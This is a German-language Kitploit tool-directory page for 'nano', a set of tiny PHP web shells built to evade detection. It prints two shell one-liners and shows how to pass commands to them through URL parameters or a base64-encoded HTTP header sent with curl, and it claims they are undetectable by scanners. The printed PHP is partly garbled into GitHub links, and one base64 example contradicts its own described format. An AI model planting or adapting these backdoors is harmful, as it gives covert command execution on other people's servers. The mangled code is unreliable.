Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nano — Nano ist eine Familie von PHP-Web-Shells, die per Code-Golfing für Tarnung optimiert sind. | Kitploit
Tools/GitHubGitHub/s0md3v/nano
Payload-GenerierungShellcodeWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubs0md3v/nano

nano

Nano ist eine Familie von PHP-Web-Shells, die per Code-Golfing für Tarnung optimiert sind.

Repository anzeigen
44991vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

nano

Nano ist eine Familie von PHP-Webshells, die durch Code-Golf extrem unauffällig und effizient gemacht wurden.
Behalte es vielleicht im Auge, ich werde hier weiterhin weitere Webshells hochladen.

Nano

root@kitploit:~
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/HEAD/$GET_%5Bc%5D);

Funktionen

  • 35 Bytes groß
  • Kann von statischen Code-Scannern nicht erkannt werden
  • Unterstützt Authentifizierung

Verwendung

http://example.com/nano.php?f=function&c=command&p=password

f steht für Funktion
c steht für Befehl
p steht für Passwort

Zum Beispiel führt der folgende Code den Befehl ls aus:

http://example.com/nano.php?f=system&c=ls&p=password

Ninja

root@kitploit:~
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/HEAD/$x%5B1%5D);

Funktionen

  • 93 Bytes groß
  • Vollständig unentdeckbar

Verwendung

Dieser ist etwas komplexer.
Angenommen, du möchtest system(ls) ausführen, dann schreibe es als system~ls und base64-kodiere es, d. h. c3lzdGVtKGxzKQ==.
Füge nun genau ein beliebiges Zeichen am Anfang hinzu. Sagen wir 'x', dann wird es xc3lzdGVtKGxzKQ==.
Öffne nun dein Terminal und gib den folgenden Befehl ein:

curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php

Zu viel Aufwand? Du kannst stattdessen den Handler verwenden.

Handler

Sonstiges

Das ist mein erstes PHP-Ding, also wenn es einen besseren Weg gibt, das zu tun, was ich getan habe, lass es mich bitte wissen oder erstelle einen Pull-Request.
Das nano-Projekt ist unter der MIT-Lizenz lizenziert, was im Grunde bedeutet, dass du mich nennen musst, wenn du es weiterverbreiten oder modifizieren möchtest.

Tool herunterladen